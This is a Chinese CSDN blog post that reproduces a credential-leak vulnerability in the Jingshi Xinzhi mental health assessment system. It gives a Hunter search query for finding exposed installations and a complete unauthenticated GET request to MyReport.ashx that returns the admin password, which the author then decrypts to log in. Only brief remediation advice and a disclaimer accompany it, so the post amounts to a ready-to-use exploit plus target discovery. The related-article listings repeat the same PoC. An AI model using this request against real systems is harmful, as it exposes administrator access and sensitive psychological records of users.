【漏洞复现】京师心智心理健康测评系统-MyReport.ashx-敏感信息泄露漏洞

最新推荐文章于 2024-03-31 14:05:23 发布
最新推荐文章于 2024-03-31 14:05:23 发布
阅读量241 收藏 5
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136917495
版权
文章揭露了京师心智心理健康测评系统中的安全漏洞,攻击者可借此获取敏感信息。漏洞复现方法和使用POC手段被提及,建议设置访问白名单并联系厂商更新补丁以保障用户信息安全。
摘要由CSDN通过智能技术生成

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

京师心智心理健康测评系统-账号密码泄露,攻击者可通过此漏洞获取敏感信息,登陆系统,获取用户信息,从而为下一步攻击做准备。

影响范围

京师心智心理健康测评系统
京师心智测评档案管理系统

资产测绘

Hunter语句:

web.body="JS/ligerComboBox/ligerTree.js"

image

漏洞复现

GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=rs4n1faiajik5huarzvi431r
Connection: close

image

使用POC获取账号密码,针对密码进行解密,登陆系统

image

修复建议

1、设置白名单限制用户访问
2、联系厂家,更新补丁

Nday_Seeker
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现
0xSec
03-20 387
京师心智心理健康测评系统 MyReport.ashx接口存在信息泄露漏洞,未经省份验证的攻击者可以利用此漏洞获取系统后台管理员账户密码凭证,并且解密后可登录后台页面,使系统处于极不安全的状态。
漏洞复现京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 198
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
漏洞复现京师心智心理健康测评系统-账号密码泄露漏洞
qq_34780861的博客
03-19 269
京师心智心理健康测评系统-账号密码泄露,攻击者可通过此漏洞获取敏感信息,从而为下一步攻击做准备。
京师心智心理健康测评系统MyReport.ashx接口存在敏感信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
03-21 119
京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露。未经身份验证的攻击者可以利用此漏洞获取系统后台管理员账户密码凭证,并且解密后可登录后台页面。
xx心智心理健康测评系统MyReport.ashx接口存在敏感信息泄露
wan___she__pi的博客
03-31 189
MyReport.ashx接口存在敏感信息泄露
漏洞复现京师心智心理健康测评系统信息泄露漏洞
KKleeeaa的博客
03-25 284
的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。响应包中包含加密的Passwd 需要解密之后才可以看到明文。声明:亲爱的读者,我们诚挚地提醒您,Aniya。0x01FoFa语句。0x02 漏洞POC。
京师心智心理健康测评系统账号密码泄露
weixin_43567873的博客
03-18 465
京师心智心理健康测评系统账号密码泄露
浙江某华智能停车综合管理系统未授权访问漏洞复现 CNVD-C-2023-517991
afei001
10-11 280
浙江某华针对智能停车系统,拥有完善的研发、测试、生产、销售、售后流程,云集了一批富有行业经验的专业人才和工程技术人员。在多年从事野外全天候环境下的交通控制技术研究的基础上,开发了整合型感应式智能停车管理系统,具有技术先进、可靠性强、征稽管理功能强的特点,为客户提供业内最为完善的出入口控制管理设备和系统解决方案。浙江大华智能停车综合管理系统存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器权限。
MyReport.TD设计器的使用教程
07-24
MyReport.TD设计器的使用教程,这个文档不错,很好。
MyReport.TD套打引擎1.0.4.0主要新功能
08-19
MyReport.TD套打引擎1.0.4.0是一个重要的更新版本,它引入了一系列的新功能,旨在提高用户的打印效率和格式设计体验。这个引擎专注于为用户提供高效且精确的套打解决方案,尤其适用于那些需要在文档中嵌入条形码、...
Flex:Web报表引擎——MyReport 2.3.0.0 + 免Flex开发集成版
02-13
Flex:Web报表引擎——MyReport 2.3.0.0 + 免Flex开发集成版 --新增功能:重新设计表达式解析引擎,支持更多函数,运算符,支持运算符函数递归嵌套 --新增功能:重新设计表达式编辑器 --新增功能:新增字体颜色设置...
Flex:Web报表引擎——MyReport 2.3.6.0 + 免Flex开发集成版
04-09
Flex:Web报表引擎——MyReport 2.3.6.0 + 免Flex开发集成版 release 2.3.6.0 --新增功能:报表编辑器支持打开/报表本地文件功能 --新增功能:单元格垂直合并 --新增功能:报表编辑器,标题行支持单个和多个单元格...
Flex:Web报表引擎MyReport 1.0.0.0
01-14
Web上的良好的打印解决方案,WinForm的打印预览体现,报表自动化,支持直接打印...* 只需少量工作就能把MyReport整合,获得良好的打印体现 * 效果图参考http://blog.csdn.net/hunkcai/archive/2010/01/14/5190898.aspx
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8331
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简约大气毕业论文答辩PPT模板
07-11
【作品名称】:简约大气毕业论文答辩PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
创意灯泡毕业答辩PPT模板 (2)
07-11
【作品名称】:创意灯泡毕业答辩PPT模板 (2) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:创意灯泡毕业答辩PPT模板 (2)
总结汇报述职简介答辩培训美容课件PPT模板
07-11
【作品名称】:总结汇报述职简介答辩培训美容课件PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
NC57固定资产.pdf
最新发布
07-11
NC57固定资产
iReport-5.6.0集成java展示报表列子
06-09
好的,这里给您提供一个iReport-5.6.0集成Java展示报表的示例代码,供您参考: 1. 首先,您需要在iReport-5.6.0中设计好需要展示的报表,并将其导出成.jasper文件,假设该文件名为"myreport.jasper"。 2. 在Java项目中,添加以下依赖: ``` <dependency> <groupId>net.sf.jasperreports</groupId> <artifactId>jasperreports</artifactId> <version>6.17.0</version> </dependency> ``` 3. 编写Java代码,加载.jasper文件并填充数据: ``` import java.io.InputStream; import java.util.HashMap; import java.util.Map; import net.sf.jasperreports.engine.JasperExportManager; import net.sf.jasperreports.engine.JasperFillManager; import net.sf.jasperreports.engine.JasperPrint; import net.sf.jasperreports.engine.JasperReport; public class ReportDemo { public static void main(String[] args) { try { // 加载.jasper文件 InputStream inputStream = ReportDemo.class.getResourceAsStream("/myreport.jasper"); JasperReport jasperReport = (JasperReport) net.sf.jasperreports.engine.util.JRLoader.loadObject(inputStream); // 填充数据,这里使用Map作为数据源 Map<String, Object> parameters = new HashMap<>(); parameters.put("parameter1", "value1"); parameters.put("parameter2", "value2"); JasperPrint jasperPrint = JasperFillManager.fillReport(jasperReport, parameters, new JREmptyDataSource()); // 导出报表,这里以PDF格式为例 JasperExportManager.exportReportToPdfFile(jasperPrint, "myreport.pdf"); } catch (Exception e) { e.printStackTrace(); } } } ``` 4. 运行Java代码,在项目根目录下生成myreport.pdf文件,即为展示的报表。 以上就是一个简单的iReport-5.6.0集成Java展示报表的示例代码,您可以根据自己的需要进行修改和扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值